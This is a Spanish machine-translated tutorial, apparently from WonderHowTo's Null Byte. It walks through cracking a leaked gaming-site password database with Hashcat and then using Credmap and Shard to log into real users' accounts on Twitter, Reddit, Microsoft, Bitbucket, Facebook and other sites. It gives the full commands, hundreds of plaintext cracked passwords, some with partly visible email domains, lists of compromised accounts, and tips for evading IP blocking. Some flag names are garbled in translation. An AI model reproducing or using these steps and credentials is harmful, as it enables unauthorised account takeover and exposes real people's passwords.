BlogWonderHowTo

Cómo: Hackear 200 cuentas de usuario en línea en menos de 2 horas (desde sitios como Twitter, Reddit y Microsoft)

Bases de datos filtradas pasan por Internet y nadie parece darse cuenta. Nos hemos vuelto insensibles a las violaciones de datos que ocurren a diario porque sucede con mucha frecuencia. Únase a mí para ilustrar por qué la reutilización de contraseñas en varios sitios web es una práctica realmente terrible, y compromete cientos de cuentas de redes sociales en el proceso.

En una reciente encuesta de LastPass, se reveló que:

Más del 53% de los encuestados confesó no haber cambiado sus contraseñas en los últimos 12 meses … a pesar de las noticias de una filtración de datos que involucró el compromiso de la contraseña.

A la gente simplemente no le importa proteger mejor sus identidades en línea y subestimar su valor para los piratas informáticos. Sentí curiosidad por saber (de manera realista) cuántas cuentas en línea podría comprometer un atacante a partir de una sola violación de datos, así que comencé a buscar en Internet en busca de bases de datos filtradas.

Paso 1: elegir al candidato

Cuando decidí investigar una infracción, quería un conjunto de datos reciente que permitiera una comprensión precisa de hasta dónde puede llegar un atacante. Me decidí por un pequeño sitio web de juegos que sufrió una violación de datos en 2017 y se filtró toda su base de datos SQL. Para proteger a los usuarios y sus identidades, no nombraré el sitio web ni revelaré ninguna de las direcciones de correo electrónico encontradas en la filtración.

El conjunto de datos consistió en aproximadamente 1,100 correos electrónicos únicos, nombres de usuario, contraseñas con hash, sales y direcciones IP de usuario separadas por dos puntos en el siguiente formato.

email:username:hashed_password:salt:ip_address

Paso 2: descifrar los hashes

Hash de contraseña está diseñado para actuar como una función unidireccional: una operación fácil de realizar que es difícil de revertir para los atacantes. Es un tipo de cifrado que convierte la información legible (contraseñas de texto sin formato) en datos codificados (hashes). Básicamente, esto significaba que necesitaba deshacer (descifrar) las cadenas hash para aprender la contraseña de cada usuario utilizando la infame herramienta de descifrado de hash Hashcat.

Creado por Jens “atom” Steube, Hashcat es la utilidad autoproclamada de recuperación de contraseñas más rápida y avanzada del mundo. Hashcat actualmente brinda soporte para más 200 algoritmos hash altamente optimizados como NetNTLMv2, LastPass, WPA / WPA2 y vBulletin, el algoritmo utilizado por el conjunto de datos de juegos que elegí. A diferencia de Aircrack-ng y John the Ripper, Hashcat admite ataques de adivinación de contraseñas basados ​​en GPU que son exponencialmente más rápidos que los ataques basados ​​en CPU.

Paso 3: Poner en perspectiva los ataques de fuerza bruta

Muchos usuarios habituales de Null Byte probablemente habrían intentado romper un apretón de manos WPA2 en algún momento de los últimos años. Para dar a los lectores una idea de cuánto más rápidos se comparan los ataques de fuerza bruta basados ​​en GPU con los ataques basados ​​en CPU, a continuación se muestra un punto de referencia de Aircrack-ng (-S) contra claves WPA2 usando una CPU Intel i7 que se encuentra en la mayoría de las computadoras portátiles modernas.

aircrack-ng -S

8560 k/s

Eso es 8.560 intentos de contraseña WPA2 por segundo. Para alguien que no esté familiarizado con los ataques de fuerza bruta, eso puede parecer mucho. Pero aquí hay un punto de referencia de Hashcat (-B) contra hashes WPA2 (-m 2500) utilizando una GPU AMD básica:

hashcat -b -m 2500

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2500 - WPA/WPA2 (Iterations: 4096)

Speed.Dev.#1.....:   155.6 kH/s (417.48ms) @ Accel:128 Loops:256 Thr:256 Vec:1

El equivalente a 155,6 kH / s es 155,600 intentos de contraseña por segundo. Imagine 18 CPU Intel i7 forzando el mismo hash simultáneamente: así de rápido puede ser una GPU.

No todos los algoritmos de cifrado y hash proporcionan el mismo grado de protección. De hecho, la mayoría proporciona una protección muy deficiente contra estos ataques de fuerza bruta. Después de descubrir que el conjunto de datos de 1,100 contraseñas con hash estaba usando vBulletin, una plataforma de foro popular, ejecuté el punto de referencia Hashcat nuevamente usando el correspondiente (-m 2711) hashmode:

hashcat -b -m 2711

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2711 - vBulletin >= v3.8.5

Speed.Dev.#1.....:  1949.6 MH/s (274.43ms) @ Accel:128 Loops:512 Thr:256 Vec:1

Eso es aproximadamente 1,949,600,000 (~ 2 mil millones) de intentos de contraseña por segundo. Con suerte, esto ilustra lo fácil que es para cualquier persona con una GPU moderna descifrar hashes después de que se haya filtrado una base de datos.

Paso 4: Forzar los hashes a la fuerza bruta

Había bastantes datos innecesarios en el volcado de SQL sin procesar, como el correo electrónico del usuario y las direcciones IP. Las contraseñas hash y las sales se filtraron en el siguiente formato.

hashed_password:salt

Las contraseñas hash se introdujeron en Hashcat mediante el siguiente comando.

hashcat -a 0 -m 2711 ~/leaks/hashes/dataset.hashes ~/wordlists/wordlist.txt -w 4 --potfile-path ~/pots/dataset.potfile

El ataque de diccionario, o “modo directo”, se especifica mediante la -a 0 argumento. Para mejorar el rendimiento general de Hashcat, generalmente establezco el -w (o –workload-profile) a 4, para maximizar la velocidad de agrietamiento. Finalmente, el –potfile-path El argumento se usó para guardar los hashes descifrados en el archivo especificado.

Después de probar docenas de listas de palabras que contienen cientos de millones de contraseñas contra el conjunto de datos, pude descifrar aproximadamente 330 (30%) de los 1,100 hashes en menos de una hora. Todavía un poco insatisfecho, probé más de las funciones de fuerza bruta de Hashcat:

hashcat -a 3 -m 2711 ~/leaks/hashes/dataset.hashes ?l?l?l?l?l?l?d?d -w 4 --potfile-path ~/pots/dataset.potfile

Aquí estoy usando Hashcat’s Ataque de máscara (-a 3) e intentando todas las minúsculas de seis caracteres posibles (? l) palabra que termina con un número de dos dígitos (?D). Este intento también se completó en un período de tiempo relativamente corto y descifró más de 100 hashes más, lo que eleva el número total de hashes descifrados a exactamente 475, aproximadamente el 43% del conjunto de datos de 1.100.

Después de volver a unir los hashes agrietados con su dirección de correo electrónico correspondiente, me quedaron 475 líneas del siguiente conjunto de datos.

******@web.de:Sodium60
******@phaphach.com:Xi@oxiao123
*****@hotmail.nl:rockybalboa
********@gmail.com:ariel420
*******@HOTMAIL.COM:SLOANE01
******@paul198112.plus.com:creative
*******@hotmail.com:67thdtR8nP
******@gmail.com:bullets
*****@terra.com.mx:590416
******@gmail.com:juan930122
*******@aol.de:Madison1990
******@verizon.net:entropy33
*****@gmail.com:flyboy21
*******@gmail.com:rat7
********@jacks.sdstate.edu:entern0w
******@gmail.com:pookieg
******@hotmail.com:kevlar11
*******@myactv.net:1oldman1
******@hotmail.com:dodgers
********@mail.ru:wodI14z2eF
*******@yahoo.de:bella1811
*****@gmail.com:jojo82
*****@hotmail.com:metalfire
*******@gmail.com:nonoobs810
******@gmail.com:bobby10
*******@gmail.com:5Zurt8q8tQ

Paso 5: Verificación de la reutilización de la contraseña

Como mencioné, este conjunto de datos se filtró de un sitio web de juegos pequeño y desconocido. Vender estas cuentas de juego produciría muy poco valor para un pirata informático. El valor es la frecuencia con la que estos usuarios reutilizan su nombre de usuario, correo electrónico y contraseña en otros sitios web populares.

Para darme cuenta de eso, Credmap y Casco se utilizaron para automatizar la detección de la reutilización de contraseñas. Estas herramientas son bastante similares, pero decidí presentar ambas porque sus hallazgos fueron diferentes en algunas formas que se detallan más adelante en este artículo.

Opción 1: uso de Credmap

Credmap es un script de Python y no requiere dependencias. Simplemente clone el repositorio de GitHub y cámbielo al directorio credmap / para comenzar a usarlo.

git clone https://github.com/lightos/credmap
cd credmap

El –lista El argumento se puede utilizar para ver los sitios web que Credmap admite actualmente.

./credmap.py --list

               . .IIIII             .II
  I123456IIII. I  II  .    II..IIIIIIIIIIIIIIIIIIII
 .  .IIIIII  II             IIIIIIHUNTER2IIIII  I.
    .IIIII.III I        IIIIIIIIIIIIIIIIIIIIIII
   .IILOVEII           II  .IIIII IIIIIIIIIIII. I
    IIIIII             IIII I  IISECRETIIIIIII I
    .II               IIIIIIIIIIIII  IIIIIIIII
       I.           .IIIABC123IIII    I   II  I
         .IIII        IIIIIIIIIIII     .       I
          IIIII.          IIIIII           . I.
          IIGODIII         IIIII             ..I  II .
           IIIIII          IIII...             IIII
            IIII           III. I            IISEXII
            III             I                I  III
            II                                   I   .
             I

credmap v0.1-d862247 (https://github.com/lightos/credmap/)

- scribd.com
- en.wikipedia.org
- stackoverflow.com
- digitalocean.com
- yahoo.com
- linkedin.com
- wunderlist.com
- bitbucket.org
- twitter.com
- amazon.com
- ebay.com
- groupon.com
- soundcloud.com
- spotify.com
- airbnb.com
- live.com
- imgur.com
- foursquare.com
- pinterest.com
- instagram.com
- trakt.tv
- yelp.com
- github.com
- pastebin.com
- facebook.com
- reddit.com
- zoho.com
- vimeo.com

Utilizando el –carga El argumento permite un formato de “nombre de usuario: contraseña”. Credmap también admite el formato “nombre de usuario | correo electrónico: contraseña” para sitios web que solo permiten iniciar sesión con una dirección de correo electrónico. Esto se puede especificar mediante el –formato “u | e: p” argumento.

./credmap.py --load ~/leaks/cracked/dataset_user_email_pass_combos.txt --format "u|e:p" --exclude "groupon.com, instagram.com"

Durante mis pruebas, descubrí que tanto Groupon como Instagram bloquearon o incluyeron en la lista negra la dirección IP de mi VPS después de unos minutos de usar Credmap. Sin duda, esto es el resultado de decenas de intentos fallidos en un período de varios minutos. Decidí omitir–excluir) estos sitios web, pero un atacante motivado puede encontrar formas sencillas de falsificar su dirección IP por intento de contraseña y limitar la velocidad de sus solicitudes para evadir la capacidad de un sitio web para detectar ataques de adivinación de contraseñas.

Los resultados del comando Credmap fueron sorprendentes:

[********:9v6Zyl1heT] on "Bitbucket"...
[********:allus82] on "Reddit"...
[********:Jesus4ever] on "Reddit"...
[********:Jesus4ever] on "Bitbucket"...
[********:s4mb4lb1J] on "Bitbucket"...
[********:xjsv12] on "Bitbucket"...
[********:rosied] on "Bitbucket"...
[********:xbox360] on "Microsoft Live Account"...
[********:seventeen17] on "Bitbucket"...
[********:starwars] on "Scribd"...
[********:Presario123] on "Bitbucket"...
[********:podpod] on "Bitbucket"...
[********:podpod] on "Microsoft Live Account"...
[********:for795] on "Bitbucket"...
[********:isbandia] on "Wikipedia"...
[********:isbandia] on "Bitbucket"...
[********:wtEq5n22aH] on "Scribd"...
[********:240sxse] on "Reddit"...
[********:warhammer40k5] on "Bitbucket"...
[********:abeeagle] on "Reddit"...
[********:99bottles] on "Reddit"...
[********:99bottles] on "Wunderlist"...
[********:99bottles] on "Microsoft Live Account"...
[********:Checkers12] on "Reddit"...
[********:Checkers12] on "Bitbucket"...
[********:morgan13] on "Pinterest"...
[********:greencar.] on "Microsoft Live Account"...
[********:Warzone1] on "Bitbucket"...
[********:o83bjJ1rzQ] on "Bitbucket"...
[********:kajfarik] on "Foursquare"...
[********:kajfarik] on "Bitbucket"...
[********:1324Michael1324] on "Reddit"...
[********:max1mili0n] on "Microsoft Live Account"...
[********:s8elpz7c] on "Microsoft Live Account"...
[********:hitman] on "Reddit"...
[********:u9Q98rtikC] on "Bitbucket"...
[********:ab1g0r] on "Bitbucket"...
[********:stingray951] on "Bitbucket"...
[********:tard] on "Bitbucket"...
[********:Pumpkin007] on "Bitbucket"...
[********:h8802123] on "Reddit"...
[********:ownership1] on "Bitbucket"...
[********:N289wewtzF] on "Bitbucket"...
[********:Hummer1234] on "Bitbucket"...
[********:igniter123] on "Reddit"...
[********:167706] on "Bitbucket"...
[********:12341234] on "Bitbucket"...
[********:sniper] on "Bitbucket"...
[********:1212111] on "Bitbucket"...
[********:element1] on "Bitbucket"...
[********:mrb1087410] on "Bitbucket"...
[********:3k3f6wJxnK] on "Bitbucket"...
[********:spy929] on "Bitbucket"...
[********:qy913zdXpN] on "Bitbucket"...
[********:E5jnhui83D] on "Bitbucket"...
[********:6qfu6oeI8V] on "Bitbucket"...
[********:Nd9nw88grB] on "Scribd"...
[********:REGan181] on "Bitbucket"...
[********:skuli2779] on "Scribd"...
[********:phalanx1] on "Foursquare"...
[********:ariel420] on "Microsoft Live Account"...
[********:SLOANE01] on "Bitbucket"...
[********:67thdtR8nP] on "Scribd"...
[********:bullets] on "Bitbucket"...
[********:flyboy21] on "Wunderlist"...
[********:pookieg] on "Reddit"...
[********:bella1811] on "Reddit"...
[********:jojo82] on "Foursquare"...
[********:nonoobs810] on "Microsoft Live Account"...
[********:maxima1231] on "Reddit"...
[********:maxima1231] on "Pinterest"...
[********:ai7o8Z8vxO] on "Scribd"...
[********:mustang1] on "Reddit"...
[********:M.ustang9939] on "Bitbucket"...
[********:Balingwenwen123] on "Bitbucket"...
[********:dragao] on "Bitbucket"...
[********:7egixeO38Q] on "Scribd"...
[********:astonm] on "Bitbucket"...
[********:Nascar2405] on "Foursquare"...
[********:Nascar2405] on "Microsoft Live Account"...
[********:carrie0530] on "Reddit"...
[********:F85wdvq3kX] on "Bitbucket"...
[********:A2w9taks7L] on "Scribd"...
[********:A2w9taks7L] on "Linkedin"...
[********:Hxopz542] on "Reddit"...
[********:hd070800] on "Pinterest"...
[********:hd070800] on "Bitbucket"...
[********:piper1956] on "Bitbucket"...
[********:123123qweqwe] on "Reddit"...
[********:xboxlive] on "Reddit"...
[********:xboxlive] on "Pinterest"...
[********:Xi%40oxiao123] on "Bitbucket"...
[********:metallica12] on "Bitbucket"...
[********:sianlaser12] on "Pinterest"...
[********:h8ep81knFR] on "Reddit"...
[********:plummer92] on "Reddit"...
[********:plummer92] on "Bitbucket"...
[********:8246jt] on "Reddit"...
[********:8246jt] on "Scribd"...
[********:271bEzxonZ] on "Bitbucket"...
[********:6911747] on "Scribd"...
[********:6911747] on "Bitbucket"...
[********:raejas11] on "Bitbucket"...
[********:d0bb3lts4lt0] on "Microsoft Live Account"...
[********:2yvpdl13CP] on "Scribd"...
[********:dodgers123] on "Bitbucket"...
[********:urbanus] on "Reddit"...
[********:0506571670] on "Foursquare"...
[********:gyqK8Giz1P] on "Bitbucket"...
[********:e6bnvVo67H] on "Bitbucket"...
[********:92k2cizCdP] on "Scribd"...
[********:drnCy43g4O] on "Reddit"...
[********:Ayrtonsenna1] on "Bitbucket"...
[********:aerielle] on "Microsoft Live Account"...
[********:12341234a] on "Reddit"...
[********:6Ibit6qp1F] on "Bitbucket"...
[********:5n6xcd6rPD] on "Scribd"...
[********:5n6xcd6rPD] on "Bitbucket"...
[********:Redalert1] on "Bitbucket"...
[********:2689874] on "Scribd"...
[********:2689874] on "Pinterest"...
[********:bma81092] on "Reddit"...
[********:bma81092] on "Bitbucket"...
[********:csibi2007] on "Reddit"...
[********:alterego] on "Bitbucket"...
[********:tournament] on "Bitbucket"...
[********:Lena2020] on "Pinterest"...
[********:Lena2020] on "Bitbucket"...
[********:alejandro] on "Scribd"...
[********:alejandro] on "Bitbucket"...
[********:Imtr0uble] on "Bitbucket"...
[********:sucette] on "Bitbucket"...
[********:pipQc5p24Q] on "Bitbucket"...
[********:moomoo] on "Pinterest"...
[********:N0t3p%40D%21] on "Scribd"...
[********:N0t3p%40D%21] on "Pinterest"...
[********:7bR9bft8cQ] on "Bitbucket"...
[********:puzzle] on "Bitbucket"...
[********:spartan117] on "Microsoft Live Account"...
[********:scooby1621] on "Microsoft Live Account"...
[********:mike1828] on "Microsoft Live Account"...
[********:fifer123] on "Microsoft Live Account"...
[********:e5Bo1fx3kF] on "Scribd"...
[********:monkey] on "Reddit"...
[********:darkstar] on "Bitbucket"...
[********:irzF9k6p1H] on "Reddit"...
[********:8yu9hkwV9Q] on "Scribd"...
[********:c0mmand] on "Bitbucket"...
[********:doppler] on "Reddit"...
[********:doppler] on "Scribd"...
[********:jh5thrwgefsdfs] on "Bitbucket"...
[********:roblox12] on "Bitbucket"...
[********:aqwzsxedc] on "Bitbucket"...
[********:12345tessi] on "Bitbucket"...
[********:helmond] on "Bitbucket"...
[********:Liam1123] on "Reddit"...
[********:liptoo98] on "Scribd"...
[********:b82olSn4yH] on "Bitbucket"...
[********:bossos2] on "Microsoft Live Account"...
[********:highjump] on "Bitbucket"...
[********:juhu1230] on "Reddit"...
[********:bepolite] on "Reddit"...
[********:M00nglum] on "Microsoft Live Account"...
[********:Adw2u1h3tO] on "Bitbucket"...
[********:Manly123] on "Bitbucket"...
[********:ragnarok01] on "Reddit"...
[********:useless] on "Pinterest"...
[********:starwars97] on "Reddit"...
[********:doodle] on "Bitbucket"...
[********:TYzt2013] on "Bitbucket"...
[********:Cheese77] on "Microsoft Live Account"...
[********:voxpi384] on "Bitbucket"...
[********:allah4life] on "Reddit"...
[********:allah4life] on "Wunderlist"...
[********:Jackal67] on "Reddit"...
[********:Jackal67] on "Bitbucket"...
[********:jasmine00] on "Bitbucket"...
[********:LXfn3BG952] on "Reddit"...
[********:alfiedog12] on "Pinterest"...
[********:25262928] on "Reddit"...
[********:25262928] on "Bitbucket"...
[********:Rat_isthebest] on "Foursquare"...
[********:Rat_isthebest] on "Scribd"...
[********:Rat_isthebest] on "Bitbucket"...
[********:Rat_isthebest] on "Wunderlist"...
[********:4kg83zRltG] on "Scribd"...
[********:4kg83zRltG] on "Bitbucket"...
[********:f1scher] on "Reddit"...
[********:o23jwr8uFD] on "Reddit"...
[********:o23jwr8uFD] on "Bitbucket"...
[********:ikbengek1] on "Pinterest"...
[********:Trustno1%21] on "Bitbucket"...
[********:trudat] on "Bitbucket"...
[********:tototomy] on "Bitbucket"...
[********:qwer1234] on "Bitbucket"...
[********:1391730] on "Foursquare"...
[********:robby123] on "Scribd"...
[********:actsman7] on "Bitbucket"...
[********:whodey] on "Wunderlist"...
[********:308184rt] on "Reddit"...
[********:108Resistance] on "Bitbucket"...
[********:yilin9409] on "Scribd"...
[********:joshuavi] on "Reddit"...
[********:damnkids] on "Bitbucket"...
[********:jbncde5hn6y5] on "Bitbucket"...
[********:roblox12] on "Reddit"...
[********:roblox12] on "Bitbucket"...
[********:azerty00] on "Reddit"...
[********:azerty00] on "Pinterest"...
[********:gymkhana] on "Bitbucket"...
[********:gymkhana] on "Wunderlist"...
[********:newgame] on "Reddit"...
[********:dacheng198] on "Scribd"...
[********:123456] on "Bitbucket"...
[********:syndrom02] on "Reddit"...
[********:Paintball1] on "Bitbucket"...
[********:4536729] on "Bitbucket"...
[********:rawtheme22] on "Reddit"...
[********:rawtheme22] on "Bitbucket"...
[********:sobaked123] on "Microsoft Live Account"...
[********:Thee1234] on "Bitbucket"...
[********:sersna7] on "Bitbucket"...
[********:indonesia2016] on "Scribd"...
[********:indonesia2016] on "Microsoft Live Account"...
[********:Ou6tlgr87N] on "Scribd"...
[********:sea2shell] on "Reddit"...
[********:01cs653] on "Reddit"...
[********:73icJf3ilZ] on "Scribd"...
[********:ndyr761pGO] on "Bitbucket"...
[********:prosk8ter] on "Bitbucket"...
[********:games%21%21%21] on "Pinterest"...
[********:games%21%21%21] on "Microsoft Live Account"...
[********:gt9800] on "Bitbucket"...
[********:mel4tipp] on "Microsoft Live Account"...
[********:mvp123] on "Reddit"...
[********:mvp123] on "Bitbucket"...
[********:3g82tafLbY] on "Bitbucket"...
[********:arturi09] on "Wunderlist"...
[********:arturi09] on "Microsoft Live Account"...
[********:092486] on "Bitbucket"...
[********:sappeps12345] on "Reddit"...
[********:1morerep] on "Bitbucket"...
[********:Finalfantasy89] on "Reddit"...
[********:Finalfantasy89] on "Bitbucket"...
[********:11%3D11bts] on "Scribd"...

Todos los nombres de usuario fueron redactados, pero podemos ver que se informó que 246 cuentas de Reddit, Microsoft, Foursquare, Wunderlist y Scribd tenían exactamente las mismas combinaciones de nombre de usuario: contraseña que el conjunto de datos del sitio web de juegos pequeños.

Opción 2: uso de Shard

Shard requiere Java, que puede no estar presente en Kali de forma predeterminada y se puede instalar usando el siguiente comando.

sudo apt-get install default-jre

Luego, descargue la última versión de Shard usando el wget mando.

wget 'https://github.com/philwantsfish/shard/releases/download/1.5/shard-1.5.jar'

Al igual que con Credmap, el –lista El argumento se puede utilizar con Shard para ver sus sitios web compatibles.

java -jar shard-1.5.jar --list

[+] Available modules:
[+]     Facebook
[+]     LinkedIn
[+]     Reddit
[+]     Twitter
[+]     Instagram
[+]     GitHub
[+]     BitBucket
[+]     Kijiji
[+]     DigitalOcean
[+]     Vimeo
[+]     Laposte
[+]     Dailymotion

El uso de Shard solo requiere –expediente argumento para comenzar a detectar la reutilización de contraseñas.

java -jar shard-1.5.jar --file ~/leaks/cracked/dataset_user_email_pass_combos.txt

[+] Running in multi-user multi-password mode
[+] Parsed 475 credentials
[+] Running 11 modules
[+] *******@mail.ru:9v6Zyl1heT - Twitter
[+] *******@mail.ru:y2v7nG3oeJ - BitBucket
[+] *******@hotmail.com:5Zurt8q8tQ - BitBucket
[+] *******@yandex.com:gD82guh6iS - BitBucket
[+] *******@hotmail.com:jellybaby - BitBucket
[+] *******@gmail.com:actsman7 - Twitter, BitBucket
[+] *******@gmail.com:eternity1 - BitBucket
[+] *******@gmail.com:joker7 - BitBucket
[+] *******@aol.com:xbox360 - BitBucket
[+] *******@gmail.com:pie110016678 - BitBucket
[+] *******@live.com:roblox12 - BitBucket
[+] *******@gmail.com:andre0 - BitBucket
[+] *******@qq.com:123456 - BitBucket
[+] *******@hotmail.com:hellomotto - BitBucket
[+] *******@outlook.com:cromador - BitBucket
[+] *******@hotmail.co.uk:ibanez92 - Twitter
[+] *******@hotmail.com:Presario123 - Twitter
[+] *******@op.pl:isbandia - BitBucket
[+] *******@gmail.com:240sxse - BitBucket
[+] *******@gmail.com:99bottles - Twitter
[+] *******@gmail.com:Checkers12 - Twitter, BitBucket
[+] *******@yahoo.com:speckles - BitBucket
[+] *******@aol.fr:o83bjJ1rzQ - BitBucket
[+] *******@michaelbodach.com:1324Michael1324 - BitBucket
[+] *******@gmail.com:drhs2012 - Twitter
[+] *******@btinternet.com:max1mili0n - Facebook, BitBucket
[+] *******@gmail.com:s8elpz7c - Twitter
[+] *******@yahoo.com:hitman - Twitter
[+] *******@mail.ru:e6bnvVo67H - BitBucket
[+] *******@gmail.com:ab1g0r - BitBucket
[+] *******@gmail.com:snickers7 - BitBucket
[+] *******@gmail.com:1949qweA - BitBucket
[+] *******@live.se:stingray951 - Twitter, BitBucket
[+] *******@outlook.com:Pumpkin007 - Facebook
[+] *******@yahoo.com:baseball11 - Twitter
[+] *******@hotmail.com:h8802123 - BitBucket
[+] *******@mail.ru:i7q8c8jDkW - BitBucket
[+] *******@gmail.com:Hummer1234 - BitBucket
[+] *******@hotmail.com:50killer - BitBucket, Kijiji
[+] *******@gmail.com:igniter123 - BitBucket
[+] *******@hotmail.se:joker123 - BitBucket
[+] *******@gmail.com:orlando.12 - BitBucket
[+] *******@gmail.com:167706 - Twitter
[+] *******@hotmail.com:pssp643056 - Twitter
[+] *******@gmail.com:tacotico - Twitter, BitBucket
[+] *******@Hotmail.com:12341234 - Twitter
[+] *******@comcast.net:1212111 - BitBucket
[+] *******@mail.ru:2hg5hd4uEE - BitBucket
[+] *******@yahoo.com:element1 - BitBucket
[+] *******@msn.com:trooper71 - Facebook, Twitter
[+] *******@gmail.com:Mustang7991 - BitBucket
[+] *******@gmail.com:fuckthat - BitBucket
[+] *******@gmail.com:qy913zdXpN - BitBucket
[+] *******@hotmail.com:vdz3888 - BitBucket
[+] *******@rogers.com:maplew00d - Facebook
[+] *******@hotmail.com:Nd9nw88grB - BitBucket
[+] *******@msn.com:1234567890 - BitBucket
[+] *******@yahoo.com:p00p00p00 - Twitter, BitBucket
[+] *******@HOTMAIL.COM:SLOANE01 - BitBucket
[+] *******@paul198112.plus.com:creative - BitBucket
[+] *******@terra.com.mx:590416 - BitBucket
[+] *******@gmail.com:juan930122 - Facebook, Twitter, BitBucket
[+] *******@aol.de:Madison1990 - BitBucket
[+] *******@verizon.net:entropy33 - BitBucket
[+] *******@gmail.com:rat7 - BitBucket
[+] *******@jacks.sdstate.edu:entern0w - BitBucket
[+] *******@hotmail.com:kevlar11 - BitBucket
[+] *******@hotmail.com:dodgers - BitBucket
[+] *******@mail.ru:wodI14z2eF - BitBucket
[+] *******@gmail.com:jojo82 - BitBucket
[+] *******@gmail.com:maxima1231 - Facebook, BitBucket
[+] *******@yahoo.com:mustang1 - BitBucket
[+] *******@gmail.com:M.ustang9939 - Twitter, BitBucket
[+] *******@gmail.com:ROFLMAO - BitBucket
[+] *******@gmail.com:qwerty - BitBucket
[+] *******@gmail.com:skatebrd1 - Twitter
[+] *******@gmail.com:carrie0530 - BitBucket
[+] *******@gmail.com:Hxopz542 - Twitter, BitBucket
[+] *******@gmail.com:hd070800 - Facebook
[+] *******@yahoo.com:xboxlive - BitBucket
[+] *******@gmail.com:sianlaser12 - BitBucket
[+] *******@live.co.uk:newworldorder11 - Facebook, Twitter
[+] *******@mail.ru:t57yuuD2nH - BitBucket
[+] *******@mail.ru:h8ep81knFR - Twitter, BitBucket
[+] *******@msn.com:Legion01 - Twitter
[+] *******@gmail.com:Vapor1948 - BitBucket
[+] *******@hotmail.com:Kerri14 - BitBucket
[+] *******@mail.ru:271bEzxonZ - BitBucket
[+] *******@gmail.com:raejas11 - Twitter
[+] *******@hotmail.com:2yvpdl13CP - BitBucket
[+] *******@mail.ru:x52Wugvl3D - BitBucket
[+] *******@hotmail.com:bcd234 - BitBucket
[+] *******@hotmail.com:dodgers123 - BitBucket
[+] *******@centurylink.net:zaq11qaz - BitBucket
[+] *******@hotmail.com:stumpy69 - BitBucket
[+] *******@gmail.com:0506571670 - Twitter, BitBucket
[+] *******@ewjc.com:fr33ze - BitBucket
[+] *******@gmail.com:gyqK8Giz1P - BitBucket
[+] *******@gmail.com:abc12345 - BitBucket
[+] *******@hotmail.com:92k2cizCdP - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@yandex.com:drnCy43g4O - Twitter
[+] *******@gmail.com:makocole1 - Twitter, Kijiji
[+] *******@gmail.com:Ayrtonsenna1 - Facebook
[+] *******@gmail.com:sixsixsix - BitBucket
[+] *******@aol.com:aerielle - BitBucket
[+] *******@yahoo.com:12341234a - Twitter
[+] *******@gmail.com:6Ibit6qp1F - BitBucket
[+] *******@gmail.com:Sapper2009 - Facebook, Twitter, BitBucket
[+] *******@gmail.com:bma81092 - Twitter, BitBucket
[+] *******@hotmail.com:tournament - BitBucket
[+] *******@hotmail.com:Lena2020 - Facebook, Twitter, BitBucket
[+] *******@yahoo.com:600543jp - BitBucket
[+] *******@blueyonder.co.uk:simpkins - BitBucket
[+] *******@gmail.com:linkin2632 - Twitter
[+] *******@yahoo.com:c572889 - Twitter
[+] *******@yahoo.com.mx:alejandro - BitBucket
[+] *******@gmail.com:conconab - BitBucket
[+] *******@free.fr:sucette - BitBucket
[+] *******@hotmail.com:pipQc5p24Q - BitBucket
[+] *******@h4milton.com:pepper10 - BitBucket
[+] *******@gmail.com:Cheese24 - BitBucket
[+] *******@gmail.com:willow76! - Facebook, Kijiji
[+] *******@live.ca:shawn2000 - Twitter, BitBucket
[+] *******@gmail.com:spartan117 - Twitter, BitBucket
[+] *******@hotmail.com:fifa2007 - Twitter
[+] *******@yahoo.com:mike1828 - BitBucket
[+] *******@live.com:Bounce989 - Twitter, BitBucket
[+] *******@gmail.com:13241324 - Twitter
[+] *******@mail.ru:e5Bo1fx3kF - BitBucket
[+] *******@mail.ru:1doc2H5wxZ - BitBucket
[+] *******@mail.ru:irzF9k6p1H - Twitter
[+] *******@gmail.com:roblox12 - Facebook, Twitter
[+] *******@hotmail.com:helmond - BitBucket
[+] *******@gmail.com:Liam1123 - BitBucket
[+] *******@yahoo.com:be6315se - Twitter
[+] *******@hotmail.com:r1s2d3nt - BitBucket
[+] *******@hotmail.com:rock18 - BitBucket
[+] *******@gmail.com:bossos2 - BitBucket
[+] *******@gmail.com:highjump - BitBucket
[+] *******@googlemail.com:juhu1230 - BitBucket
[+] *******@charter.net:amanda11 - BitBucket
[+] *******@gmail.com:Adw2u1h3tO - BitBucket
[+] *******@hotmail.com:ragnarok01 - Twitter
[+] *******@hotmail.com:Bobbobbob5 - Twitter, BitBucket
[+] *******@gmail.com:Games123 - Twitter
[+] *******@hotmail.com:good4u - Kijiji
[+] *******@hotmail.com:2211 - BitBucket
[+] *******@gmail.com:starwars97 - BitBucket
[+] *******@aol.com:hardass - BitBucket
[+] *******@gmail.com:scarface - BitBucket
[+] *******@t-online.de:143ABC1 - BitBucket
[+] *******@gmail.com:weswee234 - Twitter
[+] *******@hotmail.com:javiermago1 - BitBucket
[+] *******@yahoo.com:w1a2y3n4e5 - BitBucket
[+] *******@gmail.com:608881e - Kijiji
[+] *******@yahoo.com:074langley - BitBucket
[+] *******@hotmail.com:bosspimp - Facebook, Twitter
[+] *******@gmail.com:Driftking1 - Twitter
[+] *******@hotmail.com:voxpi384 - BitBucket
[+] *******@gmail.com:allah4life - BitBucket
[+] *******@comcast.net:Jackal67 - BitBucket
[+] *******@hotmail.com:jasmine00 - Facebook, BitBucket
[+] *******@gmail.com:10241966 - BitBucket
[+] *******@gmail.com:alfiedog12 - BitBucket
[+] *******@gmail.com:0olivia1 - BitBucket
[+] *******@gmail.com:Rat_isthebest - Kijiji
[+] *******@web.de:scoop - BitBucket
[+] *******@hotmail.com:ikbengek1 - Twitter, BitBucket
[+] *******@allansmith.net:ras04cal - Twitter
[+] *******@419.e90.biz:b82olSn4yH - BitBucket
[+] *******@hotmail.com:tototomy - Twitter
[+] *******@gmail.com:2211 - BitBucket
[+] *******@qq.com:1391730 - Twitter
[+] *******@gmail.com:robby123 - BitBucket
[+] *******@gmail.com:Logitech123 - BitBucket
[+] *******@yahoo.com:darkstar3509 - BitBucket
[+] *******@gmail.com:whodey - BitBucket
[+] *******@uhd.net.ua:h55gr5sKdQ - BitBucket
[+] *******@gmail.com:roblox12 - BitBucket
[+] *******@gmail.com:12345Brandon - BitBucket
[+] *******@gmail.com:Banan123 - BitBucket
[+] *******@gmail.com:joshuavi - Kijiji
[+] *******@cox.net:damnkids - BitBucket
[+] *******@hotmail.com:1kolort2 - BitBucket
[+] *******@live.com:roblox12 - Twitter, BitBucket
[+] *******@gmail.com:azerty00 - Twitter
[+] *******@gmail.com:apache7076 - Twitter
[+] *******@inmyd.ru:2wbJx11zaW - BitBucket
